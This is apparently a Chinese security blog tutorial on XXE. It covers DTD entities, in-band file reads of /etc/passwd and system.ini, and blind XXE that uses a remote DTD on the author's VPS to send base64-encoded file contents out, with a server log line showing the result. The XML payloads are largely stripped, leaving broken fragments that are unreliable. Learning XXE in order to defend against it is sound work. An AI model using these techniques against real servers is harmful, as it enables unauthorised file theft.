mysql注入 无回显_XML外部实体注入2:无回显的XXE

最新推荐文章于 2024-07-31 19:45:42 发布
最新推荐文章于 2024-07-31 19:45:42 发布
阅读量499 收藏 1
点赞数
文章标签: mysql注入 无回显
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42309785/article/details/113460567
版权

生如夏花之绚烂,死如秋叶之静美。

—— 泰戈尔 《生如夏花》

0

1

XML基础

XML

首先要先说下 xml。xml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。但是 xml 跟 html 是为不同目的而设计的,html 旨在显示数据信息,而 xml 旨在传输数据信息。

而且xml的标签是自己自定义,且标签一定要闭合,语法比html严格(毕竟html可以各种不闭合,较为宽松)

dtd

document type definition  DTD 中定义元素(其实就是对应 XML 中的标签) 在 DTD 中定义实体(对应XML 标签中的内容),毕竟XML 中除了能标签以外,还需要有些内容是固定的

它长这个样子

<?xml version="1.0"?>//这一行是 XML 文档定义

//定义是一个message类型的文档

//定义message元素有receiver ,sender ,header ,msg元素

定义 receiver 元素为 "#PCDATA" 类型

这个样子定义完了dtd后,写的xml内容就必须得是这个样子了

Myself

Someone

TheReminder

This is an amazing book

实体呢?重要的实体呢

来了

       //实体  相当于一个变量吧

]>

在文档中就该如此声明

//根元素

0

3

XML内部注入

这是一个相当鸡肋的漏洞,我们的目标以及注意力应该是外部注入,而不是这个

用户输入

root

比如上面这个,用户输入的一个标签,但是假如攻击者能够新增、闭合前面的标签的话,输入了下面的payload

adminhacker

就变成了

admin

hacker

root

这样改变了xml的结构了,可能就会造成其他后果,比如添加了个hacker的管理员

引用先知的一张图:

0

4

靶场代码

来查看一个内部的注入

75c2eea1ef16b946f1135f9445e36063.png

5e88be838fd4c87d656e01d58e98d0af.png

0

5

XML实体分类

1. 内置实体 (Built-in entities) 貌似没啥关系

2. 字符实体 (Character entities) 貌似没啥关系

3. 通用实体 (General entities) 着重了解

4. 参数实体 (Parameter entities) 着重了解

通用实体就是刚刚内部实体注入展示的那种

]>

而参数实体则是这种(XXE盲注的主力军)

"> %an-element; %remote-dtd;

区别则是多了个%(并且**只能在 dtd 中使用`% 实体名`**)

参数实体也可以外部引用 dtd。所以这里的重点就是**参数实体只能在 dtd 中使用,引用。**

0

6

DTD 实体的相关语法

DTD 有两种构建方式,分别为内部 DTD 声明和外部 DTD 引用。

内部 DTD 声明:

外部 DTD 引用:

DTD 实体同样有两种构建方式,分别为内部实体声明和外部实体声明。

内部实体声明:

外部实体声明:

外部实体示例:

]>

&xxe;

上述代码中,XML 的外部实体 `“xxe”` 被赋予的值为:`file:///etc/passwd`

当解析 xml 文档时,xxe 会被替换为 `file:///etc/passwd` 的内容。

0

7

XML外部实体注入

有回显的注入

实践演示一下:

读取system.ini文件

]>

&xxe;test

d080658cb345f2a8274b03505c045b08.png

初阶的利用就这样,但是这样读取文件的话如果碰到有特殊字符,则会错误,读取不了,具体的特殊字符为:

ea242d146a68a2c30324c7359a659a88.png

比如直接读取的话带有这些特殊字符的话

90d7a3e8237399834ab9504084e92f2e.png

当然我们也可以使用CDATA忽略解析文本数据

33cc532e6c4a23a30027e3f54728e5f6.png

构造的payload如下

">

 //vps的dtd地址

%dtd; ]>

&all;test

933b062a5b62d499bb08c626cbf03f3a.png

无回显的注入

%remote;

%send;

]>

3.dtd内容

">

%start;

在 3.dtd中,之所以要把“%”转成 html 实体编码是因为在实体的值中不能有“%”,所以也就只能转成`%`了。

我们现在有回显的靶场看看

d1b2f1545a184ba95a4e75543eba6f9a.png

发现虽然报错了,但是有一条记录值得我们关注

由于之前我们用了base64编码(防止解析不了)

6a8726446bd6b5aa2797acb6fa3cbda1.png

在没回显的我们该怎么看呢?

可以查看中间件的日志文件

127.0.0.1 - - [26/Mar/2020:22:43:43+0800] "GET /?CjExMTEKMTExMQoKPD4iIiY= HTTP/1.0" 403 169 "-" "-"

127.0.0.1 - - [26/Mar/2020:22:43:43+0800] "POST /noteb/vul/xxe/xxe1/doLogin.php HTTP/1.1" 200 450 "http://127.0.0.1/noteb/vul/xxe/xxe2/index.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"

0

8

后续

其他利用方式待更新

难得加油
关注
web安全渗透测试十大常规项(一):web渗透测试之MySQL注入
HACKONE的博客
03-12 1419
渗透测试之SQL注入基础SQL注入类型按照数据类型类型来分类按照执行效果来分类(页面回显效果)按照数据提交的方式来分类判断注入类型的方法MySQL注入基础联合查询注入布尔注入时间盲注注入报错注入宽字节注入二次注入偏移注入DNSlog注入注入写webshellSQL注入绕过空格绕过(过滤空过)关键字过滤SQL注入绕WAF SQL注入类型 按照数据类型类型来分类 数字型注入点 在 Web 端大概是 http://xxx.com/news.php?id=1 这种形式,其注入点 id 类型为数字,所以叫数字型注
网络攻击和渗透中:注入信息无回显?(给盲注戴上眼镜)靶机实战利用Ecshop 2.x/3.x SQL注入/任意代码执行漏洞
代码讲故事
02-04 165
网络攻击和渗透中:注入信息无回显?(给盲注戴上眼镜)靶机实战利用Ecshop 2.x/3.x SQL注入/任意代码执行漏洞。
XML外部实体注入
Lemon's blog
11-19 1209
前言: 最近做了一道WEB题,涉及到XML外部实体注入(即XXE漏洞),恰好也没有系统的学习过,这次就了解一些其攻击方式包含的原理,并通过WEB题来实战一番。 0x01:简单了解XML XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 被设计为传输和存储数据,其焦点是数据的内容 XML 被设计用来结构化、存储以及传输...
XXE回显(使用vps-payload外带)
per_se_veran_ce的博客
03-22 2297
1、抓包写入payload 2、vps根目录下存放evil.dtd文件,监听端口设置为1333 3、开启端口监听 4、Burpsuite发送请求包 5、vps监听获得/etc/passwd的base64编码 6、解码 ...
回显练习~XXE注入
最新发布
weixin_67832625的博客
07-31 204
XML外部实体注入XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
浅析无回显XXE(Blind XXE
蚁景网安学院
05-11 1300
XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。 外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。 但是,在处理外部实体时,可以针对应用程序启动许多攻击。
浅析罗尔斯的无知之幕论文/浅析无回显XXE(Blind XXE)_小白黑客详细教程
2401_84915584的博客
05-17 424
xml介绍XML是一种非常流行的标记语言,在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。
回显XXE攻击:隐秘的数据泄露技术
weixin_43822401的博客
06-14 568
回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
Xxe外部实体注入XML External Entity Injection)_externalmetadata
m0_61549674的博客
04-06 802
网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。探测内网信息、攻击内网网站、读取本地文件、读取远程文件、读取php源码。
WEB漏洞——XXE
qq_63594215的博客
04-12 908
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
sql注入之updatexml以及extractvalue函数报错注入及原理
maluxiao123的博客
03-29 1206
之前已经简单介绍了sql注入的基本原理,接下来会按照sql注入的各种类型一一进行梳理,sql注入的常见主要分为回显注入、报错注入、bool盲注、延时注入、堆叠注入、二次注入、宽字节注入、http头注、DNS LOAD注入 sql注入的报错注入利用的是页面返回了数据库报错的内容,当回显注入无法使用时使用报错注入,可用的报错函数有很多,我会介绍updatexml以及extarctvalue函数报错注入 输入单引号发现有sql报错,可以使用报错注入 payload: and(select updatexml(0
windows文件读取 xxe_XXE原来如此简单(无回显篇)
weixin_35531726的博客
01-06 1076
可能有人会好奇我为什么非要分成两篇来分享呢?我的考虑是学习需要循序渐进学习也不可能一蹴而就短暂的爆发式学习状态会让一个人丧失后续的学习动力,当然不是所有人都这样。但是绝大多数是这样的。相信你看到这篇文章的时候,你已经掌握了 回显XXE的发现和利用重点: 那么在回显XXE的发现的基础上我们来分享一下无回显XXE怎么去利用呢?既然是无回显,也就是说,我输入什么内容 ,查看什么内容,我们都将...
外部实体注入(无回显类)复现
sGanYu
03-19 1115
思路: 与有回显外部实体注入的区别在于,攻击的payload无法直接读取敏感信息。 攻击者先将请求发送至目标服务器,目标服务器解析请求,读取192.168.200.1内的恶意DTD,并执行,将结果作为参数来访问192.168.200.1上的http服务,攻击者通过访问192.168.200.1的http记录得到结果 首先在192.168.200.1上创建文件名为evil.xml 内容为 <!ENTITY % payload "<!ENTITY &#x25; send..
XXE回显攻击详解
永远是少年
12-23 1549
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE回显攻击详解。 一、XXE回显攻击简介 二、XXE回显攻击实战
XXE漏洞-黑白盒测试+无回显
xiaoheizi的博客
07-02 969
XML被设计是为了传输和存储数据,XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。test.dtd内容:
利用 DNSLog无回显注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-18 691
基本上,DNSLog服务提供了一个自定义的DNS服务器,将请求保存在日志中,并为每个请求生成一个唯一的域名。无回显注入是指在注入点无法直接获取响应的情况下,通过DNSLog获取注入结果的一种注入方式。无回显注入的原理是将注入结果作为DNS请求的一部分,通过DNSLog获取DNS请求的响应,从而获取注入结果。构造注入payload:根据目标应用程序的注入点,构造用于触发DNS请求的注入payload。通常,注入点位于应用程序的输入字段中。触发注入:向应用程序提交经过注入负载处理的请求,以触发注入攻击。
WEB攻防-XML&XXE安全&无回显方案&OOB盲注&DTD外部实体&黑白盒挖掘
siu~
11-02 536
知识点: 1、XXE&XML-原理-用途&外实体&安全 2、XXE&XML-黑盒-格式类型&数据类型 3、XXE&XML-白盒-函数审计&回显方案
sql注入回显应用情况
weixin_74182283的博客
04-08 1160
load_file为攻击的相关函数,利用concat函数将查询的version与使用的域名包含起来,其中‘\\\\’为转义字符,可以理解为转义\,输出两个\\ ,而使用\的原因也是为了模仿UNC的路径,后面那个.xxx为域名解析,而那个test则是随便输的一个文件,可以是不存在的,只是为了让查询的数据回显到dnslog上。盲注速度很慢,有时候需要一个一个字符去进行爆破,可以但不够高效,并且有时候防火墙还回去禁用ip,此时就可以考虑通过DNSLOG来快速的得到数据。站库分离(这是个作业,老师给的压缩包。
【SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 7690
【SQL注入-无回显
XXE漏洞实战:无回显任意文件读取训练
XXE漏洞是由于Web应用程序在解析XML文档时,对外部实体(External Entity)处理不当,导致攻击者能够通过恶意构造的XML请求,间接访问服务器上的敏感文件。 首先,环境搭建部分非常重要。为了演示XXE漏洞,我们建议...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值